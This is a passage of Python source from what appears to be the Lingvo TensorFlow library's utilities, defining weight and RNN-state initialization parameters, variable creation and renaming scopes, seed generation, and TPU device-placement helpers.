  """Registers `job`'s DeviceAssignment, overwriting any previous one."""
  if job in _tpu_device_assignment_dict:
    tf.logging.warning('tpu_device_assignment was already set, '
                       'overwriting with new assignment.')
  _tpu_device_assignment_dict[job] = tpu_device_assignment
# This function should be called in unittests only.
def ClearTpuDevice():
  """Drops all registered TPU device assignments (test-only helper)."""
  global _tpu_device_assignment_dict
  _tpu_device_assignment_dict = dict()
def GetTpuDeviceAssignment(job=None):
  """Returns the DeviceAssignment for `job`; raises KeyError if unset."""
  return _tpu_device_assignment_dict[job]
# Whether it's running in eager mode. This is different than
# tf.executing_eagerly(), which will return False inside a tf.function.
_IS_EAGER_MODE = False
def SetIsEagerMode():
  """Marks the process as running in eager mode (one-way switch)."""
  global _IS_EAGER_MODE
  assert tf.executing_eagerly(), 'It must be in eager mode when setting this.'
  _IS_EAGER_MODE = True
def IsEagerMode():
  """Returns True iff SetIsEagerMode() was called in this process."""
  return _IS_EAGER_MODE
# The tf.train.ExponentialMovingAverage singleton used by all subtasks in
# multi-task training with ExecutorTpu.
_EXECUTOR_EMA = None
def SetExponentialMovingAverage(ema):
  """Installs the process-wide EMA singleton; may only be set once."""
  global _EXECUTOR_EMA
  assert ema
  assert not _EXECUTOR_EMA, 'EMA was set before.'
  _EXECUTOR_EMA = ema
def ExponentialMovingAverage():
  """Returns the installed EMA singleton, or None if never set."""
  return _EXECUTOR_EMA
def SessionConfig(soft_placement=True,
                  inline=True,
                  cluster_def=None,
                  disable_meta_optimizer=False):
  """Returns a session config proto.
  Args:
    soft_placement: Turns allow_soft_placement on iff True.
    inline: Turns do_function_inlining on iff True.
    cluster_def: A tf.train.ClusterDef describing the cluster.
    disable_meta_optimizer: Turns off grappler/metagraph optimizer.
  Returns:
    A TF session config proto.
  """
  session_config = tf.config_pb2.ConfigProto(
      allow_soft_placement=soft_placement,
      graph_options=tf.GraphOptions(
          optimizer_options=tf.OptimizerOptions(
              opt_level=tf.OptimizerOptions.L1, do_function_inlining=inline)),
      cluster_def=cluster_def)
  session_config.share_cluster_devices_in_session = True
  if disable_meta_optimizer:
    # Useful if start-up time is critical.
    session_config.graph_options.rewrite_options.disable_meta_optimizer = True
  # Disable layout optimizer which increases GPU memory usage.
  session_config.graph_options.rewrite_options.layout_optimizer = (
      rewriter_config_pb2.RewriterConfig.OFF)
  return session_config
def AssertIsCompatible(a, b):
  """Asserts that the two nested structures have the same structure."""
  assert a.IsCompatible(b), ('%s vs %s' % (a, b))
def SetShapes(dst_nmap, src_nmap):
  """Set shapes in dst_nmap using those in src_nmap."""
  AssertIsCompatible(src_nmap, dst_nmap)
  for src, dst in zip(src_nmap.Flatten(), dst_nmap.Flatten()):
    dst.set_shape(src.shape)
def Dtypes(nmap_list):
  """Returns all tensors' data types in a list."""
  return [v.dtype for v in Flatten(nmap_list)]
def Flatten(x):
  """Flattens 'x' by extracting tensors from nested structures to a list."""
  return tf.nest.flatten(x)
def Pack(tmpl, values):
  """Packs 'values' according to 'tmpl'."""
  return tf.nest.pack_sequence_as(tmpl, values)
def Transform(fn, *v):
  """Replaces every nested value x in 'v' with fn(x) and returns the result."""
  return tf.nest.map_structure(fn, *v)
def ConvertNoneGradientToZeros(xs, dxs):
  """Sanitize dxs so that None becomes zeros appropriately.
  Args:
    xs: A list of tensors.
    dxs: A list of tensors. dxs[i] corresponds to xs[i]'s gradient.
  Returns:
    A `.NestedMap` same as dxs with None replaced by a zero tensor.
  """
  # Zero tensors match the shape/dtype of the corresponding x.
  fn = lambda x, dx: tf.zeros_like(x) if dx is None else dx
  return Transform(fn, xs, dxs)
def IsCompatible(lhs, rhs):
  """Returns true if lhs and rhs are compatible."""
  # EAFP: tf.nest raises on structural mismatch instead of returning a bool.
  try:
    tf.nest.assert_same_structure(lhs, rhs)
    return True
  except (ValueError, TypeError):
    return False
class _Unique:
  """Stateful predicate that accepts each non-None object exactly once.

  Identity (id()) is used for deduplication, so two equal-but-distinct
  objects are both accepted.
  """

  def __init__(self):
    self._vset = set()

  def __call__(self, v):
    if v is None:
      return False
    key = id(v)
    if key in self._vset:
      return False
    self._vset.add(key)
    return True
def ToUniqueList(nmap):
  """Returns the flattened `nmap` with duplicates removed."""
  # _Unique drops None entries and repeats (by object identity).
  return nmap.Filter(_Unique()).Flatten()
def ReadOnlyAttrDictView(backing):
  """Wraps a dict to provide a read-only view of its contents.
  Dict keys can also be accessed by attribute.
  Args:
    backing: Dict-like object to wrap.
  Returns:
    Read-only Mapping that can be accessed by index (['foo']) or attr (d.foo).
  """

  class Wrapper:
    """Immutable view that delegates every lookup to `backing`."""

    # Disable pytype attribute checking.
    _HAS_DYNAMIC_ATTRIBUTES = True

    def __getattr__(self, key):
      return backing[key]

    def __hasattr__(self, key):
      return key in backing

    def __getitem__(self, key):
      return backing[key]

    def __len__(self):
      return len(backing)

    def __iter__(self):
      return iter(backing)

    # All mutation paths fail loudly.
    def __setattr__(self, key, value):
      raise AttributeError('Dictionary is read-only.')

    def __setitem__(self, key, value):
      raise AttributeError('Dictionary is read-only.')

  return Wrapper()
def ToStaticShape(shape):
  """Converts 'shape' to a static shape.

  Unwraps tf.Dimension values and evaluates symbolic dimension expressions to
  concrete values. Accepts a list/tuple of dims or a single dim.
  """
  if isinstance(shape, (list, tuple)):
    shape = [
        dim.value if isinstance(dim, tf.Dimension) else dim for dim in shape
    ]
    static_shape = []
    for dim in shape:
      if symbolic.IsExpr(dim):
        # Resolve symbolic dims against the currently bound symbol values.
        static_shape.append(symbolic.ToStatic(dim))
      else:
        static_shape.append(dim)
    return static_shape
  else:
    return shape.value if isinstance(shape, tf.Dimension) else shape
def Zeros(shape, *args, **kwargs):
  """tf.zeros() that also accepts symbolic/tf.Dimension shapes."""
  return tf.zeros(ToStaticShape(shape), *args, **kwargs)
class UniformSampler:
  """A reservoir sampler.
  This class implements reservoir sampling: Given a limit of `num_samples` total
  samples, this class maintains a uniform probability (1 / `num_samples`) of
  keeping any item dynamically added to the sampler.
  See https://en.wikipedia.org/wiki/Reservoir_sampling for details.
  """

  def __init__(self, num_samples):
    assert num_samples > 0
    self._num_samples = num_samples
    self._num_seen_items = 0
    self._samples = []

  def Add(self, item):
    """Add item to sampler."""
    self._num_seen_items += 1
    if len(self._samples) < self._num_samples:
      # Reservoir not yet full: keep everything.
      self._samples.append(item)
      return
    # Keep the new item with probability num_samples / num_seen_items by
    # drawing a uniform slot over all items seen so far.
    slot = np.random.randint(0, self._num_seen_items)
    if slot < self._num_samples:
      self._samples[slot] = item

  @property
  def samples(self):
    """Fetch the current samples from the sampler."""
    return self._samples
class RNNCellStateInit:
  """State initialization functions for RNN cell init state."""
  @staticmethod
  def _Params(method, seed):
    # Builds the frozen hyperparams describing one init method.
    p = hyperparams.Params()
    p.Define('method', method,
             'Initialization method. Should be one of zeros, random_normal.')
    p.Define('seed', seed, 'Random seed used to generate initial values.')
    p.Freeze()
    return p
  @staticmethod
  def Zeros():
    """tf.zeros()."""
    return RNNCellStateInit._Params('zeros', seed=None)
  @staticmethod
  def RandomNormal(seed=None):
    """tf.random.normal()."""
    return RNNCellStateInit._Params('random_normal', seed)
def DefaultRNNCellStateInit():
  """Returns the default state init (zeros)."""
  return RNNCellStateInit.Zeros()
def InitRNNCellState(shape, init=None, dtype=None, name=None, is_eval=False):
  """Initial state definitions for RNN cell implementations.
  Args:
    shape: An array of ints/symbols for specifying the shape of the state.
    init: Hyperparameters as returned by one of the static implementations in
      RNNCellStateInit.
    dtype: The dtype of the states. Defaults to tf.float32.
    name: A name for the operation. If --stateless_vars_init is set, this name
      is used to generate a seed on a per-variable basis. Otherwise, this name
      is optional.
    is_eval: Bool, set to True if we need special behavior in eval mode.
  Returns:
    A Tensor of the specified shape, and sampled from the distribution as
    defined by the init parameters.
  """
  shape = ToStaticShape(shape)
  if init is None:
    init = DefaultRNNCellStateInit()
  if dtype is None:
    dtype = tf.float32
  method = init.method
  # In eval, random_normal degrades to zeros for deterministic behavior.
  if ((method in ['zeros']) or (method in ['random_normal'] and is_eval)):
    init_state = tf.zeros(shape=shape, dtype=dtype, name=name)
  elif method in ['random_normal']:
    if use_stateless_vars_init():
      if name is None:
        raise ValueError('InitRNNCellState() requires a `name` argument when '
                         '--stateless_vars_init is enabled.')
      # Stateless RNG: seed derived from the name so results are reproducible.
      seed = _GenerateStatelessRngSeed(name, init.seed)
      init_state = stateless_random_ops.stateless_random_normal(
          shape=shape, dtype=dtype, name=name, seed=seed)
    else:
      init_state = tf.random.normal(
          shape=shape, dtype=dtype, name=name, seed=init.seed)
  else:
    raise ValueError('Initialization method (%s) not supported.' % method)
  return init_state
class WeightInit:
  """Static class providing weight initialization config params.

  Each factory method returns a frozen hyperparams.Params with fields
  (method, scale, seed) that downstream variable creation interprets.
  """
  @staticmethod
  def _Params(method, scale, seed):
    """Parameters of this class."""
    p = hyperparams.Params()
    p.Define('method', method, 'Initialization method.')
    p.Define('scale', scale, 'Initialization scale.')
    p.Define('seed', seed, 'Random seed used to generate initial values.')
    p.Freeze()
    return p
  @staticmethod
  def Gaussian(scale=1.0, seed=None):
    """scale * tf.random.normal(0, 1.0)."""
    return WeightInit._Params('gaussian', scale, seed)
  @staticmethod
  def Uniform(scale=1.0, seed=None):
    """scale * tf.random.uniform(-1.0, 1.0)."""
    return WeightInit._Params('uniform', scale, seed)
  @staticmethod
  def UniformPositive(scale=1.0, seed=None):
    """scale * tf.random.uniform(0., 1.0)."""
    return WeightInit._Params('uniform_positive', scale, seed)
  @staticmethod
  def Category(scale=2, seed=None):
    """tf.floor(scale * tf.random.uniform(0., 1.0))."""
    return WeightInit._Params('category', scale, seed)
  @staticmethod
  def Xavier(scale=1.0, seed=None):
    """Xavier initialization (x = sqrt(6. / (in + out)); [-x, x])."""
    return WeightInit._Params('xavier', scale, seed)
  @staticmethod
  def XavierWithFixupParams(scale=1.0,
                            depth=1.0,
                            layers_per_residual_block=1.0,
                            seed=None):
    """Xavier initialization with Fixup."""
    # Fixup rescales by depth^(-1 / (2 * m)) where m is layers per block.
    scale = scale * math.pow(depth, (-1.0 / (2 * layers_per_residual_block)))
    return WeightInit._Params('xavier', scale, seed)
  @staticmethod
  def GeoMeanXavier(scale=1.0, seed=None):
    """A variant of Xavier (x = sqrt(3. / sqrt(in * out)); [-x, x])."""
    return WeightInit._Params('geo_mean_xavier', scale, seed)
  @staticmethod
  def Constant(scale=1.0):
    """scale."""
    return WeightInit._Params('constant', scale, 0)
  @staticmethod
  def TruncatedGaussian(scale=1.0, seed=None):
    """scale * tf.random.truncated_normal(0, 1.0)."""
    return WeightInit._Params('truncated_gaussian', scale, seed)
  @staticmethod
  def GaussianSqrtDim(scale=1.0, seed=None):
    """scale * tf.random.normal(0, 1 / sqrt(dim0))."""
    return WeightInit._Params('gaussian_sqrt_dim', scale, seed)
  @staticmethod
  def GaussianSqrtFanIn(scale=1.0, seed=None):
    """scale * tf.random.normal(0, 1 / sqrt(fan_in))."""
    return WeightInit._Params('gaussian_sqrt_fanin', scale, seed)
  @staticmethod
  def GaussianSqrtFanOut(scale=1.0, seed=None):
    """scale * tf.random.normal(0, 1 / sqrt(fan_out))."""
    return WeightInit._Params('gaussian_sqrt_fanout', scale, seed)
  @staticmethod
  def GaussianSqrtFanAvg(scale=1.0, seed=None):
    """tf.random.normal(0, sqrt(2.0 / (in + out)))."""
    return WeightInit._Params('gaussian_sqrt_fanavg', scale, seed)
  @staticmethod
  def UniformSqrtDim(scale=1.0, seed=None):
    """scale * tf.uniform(-1 / sqrt(dim0), 1 / sqrt(dim0))."""
    return WeightInit._Params('uniform_sqrt_dim', scale, seed)
  @staticmethod
  def UniformUnitScaling(scale=1.0, seed=None):
    """scale * sqrt(3) / sqrt(dim0) * tf.uniform(-1, 1)."""
    return WeightInit._Params('uniform_unit_scaling', scale, seed)
  @staticmethod
  def UniformUnitScalingFanAvg(scale=1.0, seed=None):
    """Same as tf.variance_scaling_initializer() ...
    Samples are drawn from a uniform distribution within [-limit, limit], with
    limit = sqrt(3 * scale / n)
    where
    n = max(1., (fan_in + fan_out) / 2).
    See tf.keras.initializers.VarianceScaling for details.
    Args:
      scale: A Python float.
      seed: A Python int or None.
    Returns:
      A WeightInit param.
    """
    return WeightInit._Params('uniform_unit_scaling_fan_avg', scale, seed)
  @staticmethod
  def TruncatedGaussianSqrtDim(scale=1.0, seed=None):
    """scale * tf.random.truncated_normal(0, 1 / sqrt(dim0))."""
    return WeightInit._Params('truncated_gaussian_sqrt_dim', scale, seed)
  @staticmethod
  def TruncatedGaussianSqrtFanIn(scale=1.0, seed=None):
    """scale * tf.random.truncated_normal(0, 1 / sqrt(fan_in))."""
    return WeightInit._Params('truncated_gaussian_sqrt_fanin', scale, seed)
  @staticmethod
  def TruncatedGaussianSqrtFanOut(scale=1.0, seed=None):
    """scale * tf.random.truncated_normal(0, 1 / sqrt(fan_out))."""
    return WeightInit._Params('truncated_gaussian_sqrt_fanout', scale, seed)
  @staticmethod
  def KaimingUniformFanInRelu(scale=1.0, seed=None):
    """Kaiming uniform initialization for fan-in with ReLU nonlinearity."""
    return WeightInit._Params('kaiming_uniform_fanin_relu', scale, seed)
  @staticmethod
  def KaimingUniformFanInLeakyRelu(scale=np.sqrt(5.), seed=None):
    """Kaiming uniform initialization for fan-in with leaky-ReLU nonlinearity."""
    return WeightInit._Params('kaiming_uniform_fanin_leakyrelu', scale, seed)
# Sentinel scale marking "the user did not choose an initializer explicitly".
_DEFAULT_XAVIER_INIT = 1.000001
def DefaultParamInit():
  # Here we use 1.000001 as a signature for user picking up the
  # default param initializer.
  return WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
# TODO(rpang, jonathanasdf): explore adding _is_default to hyperparams.Param.
def IsDefaultParamInit(p):
  """Returns True iff `p` is (within float tolerance) DefaultParamInit()."""
  return (p.method == 'xavier' and
          abs(p.scale - _DEFAULT_XAVIER_INIT) < 1e-7 and p.seed is None)
def WeightParams(shape,
                 init=None,
                 dtype=None,
                 collections=None,
                 device_mesh=None,
                 tensor_split_dims_mapping=None):
  """Returns a hyperparams for a weight variable given the shape/init/dtype."""
  if init is None:
    init = WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
  if dtype is None:
    dtype = tf.float32
  if collections is None:
    collections = []
  if device_mesh is not None:
    # Sharding spec must cover every tensor dimension when a mesh is given.
    assert tensor_split_dims_mapping is not None
    assert len(tensor_split_dims_mapping) == len(shape)
  p = hyperparams.Params()
  p.Define('dtype', dtype, 'The weight data type.')
  p.Define('shape', shape, 'The weight shape.')
  p.Define('init', init, 'Initialization method.')
  p.Define('collections', collections,
           'Variable collections this weight belongs to.')
  p.Define(
      'device_mesh', device_mesh,
      'A numpy.ndarray describing the topology of a device mesh to partition'
      ' this variable onto. Each element in the np.ndarray is the ID of a'
      ' device in the topology. device_mesh and tensor_split_dims_mapping below'
      ' together specifies how this weight tensor should be sharded across'
      ' different tpu cores. If None, this variable is not sharded.'
      ' Here are examples: np.array([0, 1, 2, 3, 4, 5, 6, 7]) which is a 1d'
      ' mesh with 8 devices, np.array([[0, 1, 2, 3], [4, 5, 6, 7]]) which is'
      ' 2d matrix of 8 devices.')
  p.Define(
      'tensor_split_dims_mapping', tensor_split_dims_mapping,
      'A list of integers that map each tensor axis to the device mesh axis'
      ' along which it is sharded. Its length is the tensor rank, and'
      ' split_dims_mapping[i] is device mesh axis for tensor dimension i. Use'
      ' -1 for tensor dimensions that are not sharded. If the list is set to'
      ' None and a device_mesh is specified, the sharding will be treated as'
      ' replicated. Here is a concrete examples: '
      ' device_mesh=np.array([[0, 1, 2, 3] [4, 5, 6, 7]]), of shape [2, 4]'
      ' shape=[x, y, z], so this is a 3d variable.'
      ' tensor_split_dims_mapping=[-1, -1, 1], in this case, the third dim'
      ' of the variable is split along the second dim of the mesh. Each '
      ' split of the variable is of the shape [x, y, z/4].')
  return p
def FindNeeded(endpoints):
  """List names of tensors and operations required to compute endpoints.

  Walks the graph backwards (BFS over op inputs and control inputs) from the
  given endpoints and collects the names of every op and its output tensors.
  """
  names_seen = set()
  queue = []
  for e in Flatten(endpoints):
    if isinstance(e, tf.Operation):
      queue.append(e)
    else:
      # Tensors map to their producing op.
      queue.append(e.op)
  while queue:
    op = queue.pop()
    name = op.name
    if name not in names_seen:
      names_seen.add(name)
      names_seen.update((o.name for o in op.outputs))
      queue.extend(i.op for i in op.inputs)
      queue.extend(op.control_inputs)
  return names_seen
class _CollectionGetter:
  """Get graph local value from a defined collection.

  Lazily creates the value via `default_factory` on first access and caches
  it in the graph collection keyed by `key`.
  """
  def __init__(self, key, default_factory):
    self._key = key
    self._default_factory = default_factory
  def __call__(self):
    collection = tf.get_collection(self._key)
    if collection:
      # The collection holds at most one value by construction.
      assert len(collection) == 1
      return collection[0]
    value = self._default_factory()
    tf.add_to_collection(self._key, value)
    return value
def SanitizeScopeKey(key):
  """Removes invalid symbols from name_scope keys."""
  # Drop a single leading underscore, then map '[' -> '_' and delete ']'.
  trimmed = key[1:] if key.startswith('_') else key
  return trimmed.translate(str.maketrans({'[': '_', ']': None}))
# Maintain a session for unit tests (initialized in test_utils.py).
_SESSION_SCOPE = ThreadLocalStack()
@contextlib.contextmanager
def UnitTestSessionScope(sess):
  """Pushes `sess` as the current unit-test session for the scope's duration."""
  _SESSION_SCOPE.stack.append(sess)
  try:
    yield
  finally:
    _SESSION_SCOPE.stack.pop()
def GetUnitTestSession():
  """Get the current unit-test session, or None outside any scope."""
  return _SESSION_SCOPE.stack[-1] if _SESSION_SCOPE.stack else None
# Global variable to control multitask variable reuse
# If False (default) the default tf.get_variable is used, that is:
# - Reusing scopes only allow getting existing variables
# - Non-reusing scopes only allow getting new variables
# With GetOpportunisticVariableReuse() == True:
# - Reusing scopes only allow getting existing variables, as usual
# - Non-reusing scopes reuse new variables or get new ones
_OPPORTUNISTIC_VARIABLE_REUSE = ThreadLocalStack()
@contextlib.contextmanager
def OpportunisticVariableReuseScope(enable_opportunistic_reuse=True):
  """Scopes the opportunistic-reuse setting (see module comment above)."""
  _OPPORTUNISTIC_VARIABLE_REUSE.stack.append(enable_opportunistic_reuse)
  try:
    yield
  finally:
    _OPPORTUNISTIC_VARIABLE_REUSE.stack.pop()
def GetOpportunisticVariableReuse():
  """Get the current variable reuse setting."""
  return (_OPPORTUNISTIC_VARIABLE_REUSE.stack[-1]
          if _OPPORTUNISTIC_VARIABLE_REUSE.stack else False)
# Stack of variable renaming rule lists (see VariableRenameScope below).
_VARIABLE_RENAME_RULES = ThreadLocalStack()
# Global variable to track task calling scope.
# Currently only used for TPU Embedding purposes as a TPUEmbeddingLayer
# may be shared across tasks and the calling task needs to be known
# for tracking embedding activations for backprop.
_TASK_CALL_SCOPE = ThreadLocalStack()
def TaskCallScopeName(task):
  """Get a unique string identifying a task."""
  # Combine the configured task name with the object id so two task objects
  # sharing a name still map to distinct scopes.
  return '{}_{}'.format(task.params.name, id(task))
@contextlib.contextmanager
def TaskCallScope(task):
  """Marks `task` as the currently-calling task for the scope's duration."""
  _TASK_CALL_SCOPE.stack.append(TaskCallScopeName(task))
  try:
    yield
  finally:
    _TASK_CALL_SCOPE.stack.pop()
def GetTaskCallScope():
  """Get the current task call scope."""
  return _TASK_CALL_SCOPE.stack[-1] if _TASK_CALL_SCOPE.stack else None
@contextlib.contextmanager
def VariableRenameScope(renames):
  """Append the renaming rules to the stack of renames.
  Args:
    renames: pairs of (regexp, new_name_format). If the regexp matches, the
      new_name_format will be interpolated using the matched groups.
  Yields:
    scope in which the renaming rules are applied
  """
  _VARIABLE_RENAME_RULES.stack.append(renames)
  try:
    yield
  finally:
    _VARIABLE_RENAME_RULES.stack.pop()
def GetVariableName(name):
  """Get variable name after application of all renaming rules.

  Args:
    name: untransformed variable name with scope_name prepended

  Returns:
    name possibly modified using renaming rules
  """
  new_name = name
  found_match = False
  for rule_set in _VARIABLE_RENAME_RULES.stack:
    for pattern, name_format in rule_set:
      m = re.match(pattern, name)
      if m is None:
        continue
      if found_match:
        tf.logging.warning('Multiple matches for: %s', name)
      found_match = True
      # Later matching rules overwrite earlier ones; all match the
      # original name, not the intermediate result.
      new_name = name_format % m.groups()
  if new_name != name:
    tf.logging.info("WARNING!!! Renaming variable '%s' to '%s'", name, new_name)
  return new_name
_LIST_REGEX_DTYPE = ThreadLocalStack()
@contextlib.contextmanager
def VariableListDtypeRegexScope(list_regex_dtypes):
  """Append the list of (regex, dtype) to override the dtype.

  Args:
    list_regex_dtypes: pairs of (regexp, dtype). If the regexp matches, the
      data type of the variable will be changed by the corresponding dtype.

  Yields:
    scope in which the list of (regex, dtype) is applied.
  """
  _LIST_REGEX_DTYPE.stack.append(list_regex_dtypes)
  try:
    yield
  finally:
    # Remove this scope's overrides even if the body raises.
    _LIST_REGEX_DTYPE.stack.pop()
def FindDataType(var_name):
  """Find the data type for var_name.

  Args:
    var_name: A string, name of the variable.

  Returns:
    The dtype of the first matched regex with var_name, or None if no matching
    found.
  """
  for overrides in _LIST_REGEX_DTYPE.stack:
    for pattern, dtype in overrides:
      if re.match(pattern, var_name) is not None:
        return dtype
  return None
def GenerateSeedFromName(name):
  """Generate a random seed from a name string.

  Args:
    name: A string (or bytes).

  Returns:
    An integer (np.int64) seed in the range [0, 2**31 - 1).
  """
  # Encode inline instead of via six.ensure_binary: this file already uses
  # Python-3-only syntax (f-strings), so the six shim is unnecessary here.
  # six.ensure_binary encodes str as utf-8 and passes bytes through, which is
  # exactly what this reproduces.
  data = name.encode('utf-8') if isinstance(name, str) else name
  md5 = hashlib.md5()
  md5.update(data)
  # Fold the 128-bit digest into the valid seed range.
  return np.int64(int(md5.hexdigest(), 16) % (2**31 - 1))
def MaybeGenerateSeedFromScope():
  """Generate a random seed from the current name of the scope.

  If running in eager mode, this returns 0.

  Returns:
    An integer seed in the range [0, 2**31 - 1).
  """
  # Eager mode has no graph op names to derive a seed from.
  if tf.executing_eagerly():
    return 0
  return GenerateSeedFromName(tf.no_op(name='new_step_seed').name)
def GenerateSeedFromId(obj_id):
  """Generate a random seed from the id of an object.

  If deterministic execution (i.e. unit test), generate the seed from a fixed
  unique name instead.

  Args:
    obj_id: id(object).

  Returns:
    An integer seed in the range [0, 2**31 - 1).
  """
  if tf.get_default_graph().seed is not None:
    # We are in a program/test which needs deterministic randomization.
    with tf.name_scope(''):
      # The scope-unique op name serves as a stable seed source across runs.
      return GenerateSeedFromName(tf.no_op(name='new_step_seed').name)
  md5 = hashlib.md5()
  # np.int64 exposes the buffer protocol; its raw bytes feed the hash.
  md5.update(np.int64(obj_id))
  return np.int64(int(md5.hexdigest(), 16) % (2**31 - 1))
# To keep track of all the variables ever created by the CreateVariable
# routine below.
_ALL_VARS_KEY = ('__lingvo_all_vars',)
_get_all_vars = _CollectionGetter(_ALL_VARS_KEY, lambda: {})

# Thread-local stack of integer shape prefixes added by
# VariableShapePrefixContext() to variables created by CreateVariable().
_VARIABLE_SHAPE_PREFIXES = ThreadLocalStack()
def GetVarLeadingDimsAsCombinedLayers(var):
  """Gets the number of leading dimensions of `var` marked as combined layers.

  Such dimensions represent variables from different layers stacked together,
  e.g., in RepeatLayer, and optimizers (which have shape-dependant behaviors)
  can adjust its behavior based on this information to match the behavior for
  separate layer variables.

  Args:
    var: A variable.

  Returns:
    An integer representing the number of leading dimensions.
  """
  try:
    return var.op.get_attr('_num_leading_dims_for_combined_layers')
  except (ValueError, AttributeError):
    # ValueError: the attribute was never set on the op.
    # AttributeError: 'DistributedVarOp' object has no attribute 'get_attr'.
    return 0
@contextlib.contextmanager
def VariableShapePrefixContext(shape_prefix):
  """Add a shape prefix to variable created by CreateVariable().

  This new dimension will be marked as combined-layers. See also comments for
  GetVarLeadingDimsAsCombinedLayers().

  Args:
    shape_prefix: a positive integer of shape prefix.

  Yields:
    None.
  """
  assert shape_prefix > 0, ('%s' % shape_prefix)
  _VARIABLE_SHAPE_PREFIXES.stack.append(shape_prefix)
  try:
    yield
  finally:
    # Restore the previous prefix list even if the body raises.
    _VARIABLE_SHAPE_PREFIXES.stack.pop()
def GetVariableShapePrefixes():
  """Return the list of shape prefixes for CreateVariable().

  Note: this returns the live thread-local list, not a copy.
  """
  return _VARIABLE_SHAPE_PREFIXES.stack
def GetVariableNumLeadingDimsForCombinedLayersContext():
  """Return the number of leading combined-layers dims for CreateVariable()."""
  # Each active VariableShapePrefixContext contributes exactly one leading dim.
  return len(_VARIABLE_SHAPE_PREFIXES.stack)
def GetFanInFanOut(shape, prefix_dims_to_skip):
  """Returns (fan_in, fan_out) of a weight variable of the give shape."""
  if not shape:
    return None, None
  if len(shape) < prefix_dims_to_skip:
    raise ValueError(f'Variable shape is {shape} but prefix_dims_to_skip is '
                     f'{prefix_dims_to_skip}, larger than the shape rank.')
  # Drop the combined-layers prefix dims before computing fans.
  core = shape[prefix_dims_to_skip:]
  if not core:
    return 1, 1
  if len(core) == 1:
    # Following _compute_fans() from TF's init_ops.py.
    return core[0], core[0]
  # All dims except the last two form the receptive field (e.g. conv kernels).
  receptive_field = 1
  for dim in core[:-2]:
    receptive_field *= dim
  return core[-2] * receptive_field, core[-1] * receptive_field
_VARIABLE_CREATOR_STACK = ThreadLocalStack().stack
def _DefaultVariableCreator(**kwargs):
  """Innermost creator: strips lingvo-only kwargs, calls tf.get_variable."""
  for key in ('var_name', 'var_params'):
    kwargs.pop(key, None)
  return tf.get_variable(**kwargs)
def _GetVariableCreator():
  """Composes the creator stack so the outermost wrapper runs first."""
  # Fold the stack from the innermost (tf.get_variable) outward; each wrapper
  # receives the already-composed inner chain as its `next_creator`.
  return functools.reduce(
      lambda inner, wrapper: functools.partial(wrapper, inner),
      reversed(_VARIABLE_CREATOR_STACK), _DefaultVariableCreator)
@contextlib.contextmanager
def VariableCreatorScope(variable_creator):
  """Yields a context around a variable_creator, used by `CreateVariable()`.

  The function must have the following signature::

    def variable_creator(next_creator, **kwargs)

  The function may delegate variable creation to the next variable creator, or
  return its own tf.Variable.

  This differs from tf.variable_creator_scope in that tf.variable_creator_scope
  modifies a tf.Variable() call while this modifies a tf.get_variable() call.
  As the code is migrated to TF2 and tf.get_variable() is deprecated, this may
  be upgraded to using tf.variable_creator_scope instead.

  This differs from tf.variable_scope(custom_getter=variable_creator) in that
  the kwargs passed can be manipulated.

  Variable creators are resolved from the outermost towards the innermost.
  The innermost variable creator function is tf.get_variable.

  The passed in kwargs must conform to what tf.get_variable accepts, with the
  addition of `var_name` and `var_params`.

  Args:
    variable_creator: A variable creator function.
  """
  _VARIABLE_CREATOR_STACK.append(variable_creator)
  try:
    yield
  finally:
    # Unregister even if the body raises.
    _VARIABLE_CREATOR_STACK.pop()
def PlaceOnTpuCore(core_id):
  """Returns a VariableCreatorScope that places variables on a given tpu core.

  Only applies when running with TPUs.

  Does not yet properly support model parallelism.

  Args:
    core_id: The tpu core id.
  """

  def Creator(next_creator, **kwargs):
    """Creates the variable within a tf.device() scope for the chosen core."""
    cluster = cluster_factory.Current()
    if use_tpu():
      device = cluster.WorkerDeviceInModelSplit(core_id)
    elif (
        tpu_compat() and
        cluster.params.job in ('controller', 'trainer_client', 'executor_tpu')):
      # The job is running in a fleet that uses tpu, but does not itself have
      # access to the tpu, e.g. controller job. In this case, the returned
      # device needs to be the cpu device on the tpu host for the given core.
      # FIXME: the current implementation is wrong for large values of core_id.
      device = cluster.ListDevices(cluster.params.worker)[0, 0]
    else:
      # Not a TPU (or TPU-compatible) job; no placement constraint.
      device = ''
    with tf.device(device):
      return next_creator(**kwargs)

  return VariableCreatorScope(Creator)
# TODO(yonghui): Add support for partitioned Variables.
def CreateVariable(name,
                   params,
                   reuse=None,
                   trainable=True,
                   collections=None,
                   default_seed=None,
                   synchronization=tf.VariableSynchronization.AUTO,
                   aggregation=tf.VariableAggregation.NONE):
  """Creates tf.Variable according to param_config.

  Args:
    name: A string, name of the variable.
    params: A WeightParams specifying the details of how this variable should
      be constructed and initialized.
    reuse: Whether or not to reuse an existing variable. It has the same
      semantics as the reuse arg in tf.variable_scope.
    trainable: Whether or not the variable is trainable.
    collections: Override the default variable collection (
      tf.GraphKeys.GLOBAL_VARIABLES).
    default_seed: Seed to use for initialization if not specified in params.
      Used for deterministic initialization in tests.
    synchronization: Indicates when a distributed a variable will be
      aggregated. Accepted values are constants defined in the class
      tf.VariableSynchronization. By default the synchronization is set to
      AUTO and the current DistributionStrategy chooses when to synchronize.
    aggregation: Indicates how a distributed variable will be aggregated.
      Accepted values are constants defined in the class
      tf.VariableAggregation.

  Returns:
    The created variable.
  """
  # Select the stateless- or stateful-RNG implementation, then delegate.
  impl = (_CreateVariableStateless
          if use_stateless_vars_init() else _CreateVariableStateful)
  return impl(name, params, reuse, trainable, collections, default_seed,
              synchronization, aggregation)
def _CreateVariableStateful(name,
                            params,
                            reuse=None,
                            trainable=True,
                            collections=None,
                            default_seed=None,
                            synchronization=tf.VariableSynchronization.AUTO,
                            aggregation=tf.VariableAggregation.NONE):
  """Creates tf.Variable using TF stateful RNGs according to param_config.

  Args:
    name: A string, name of the variable.
    params: A WeightParams specifying the details of how this variable should
      be constructed and initialized.
    reuse: Whether or not to reuse an existing variable. It has the same
      semantics as the reuse arg in tf.variable_scope.
    trainable: Whether or not the variable is trainable.
    collections: Override the default variable collection (
      tf.GraphKeys.GLOBAL_VARIABLES).
    default_seed: Seed to use for initialization if not specified in params.
      Used for deterministic initialization in tests.
    synchronization: Indicates when a distributed a variable will be
      aggregated. Accepted values are constants defined in the class
      tf.VariableSynchronization. By default the synchronization is set to
      AUTO and the current DistributionStrategy chooses when to synchronize.
    aggregation: Indicates how a distributed variable will be aggregated.
      Accepted values are constants defined in the class
      tf.VariableAggregation.

  Returns:
    The created variable.
  """
  p = params.Copy()
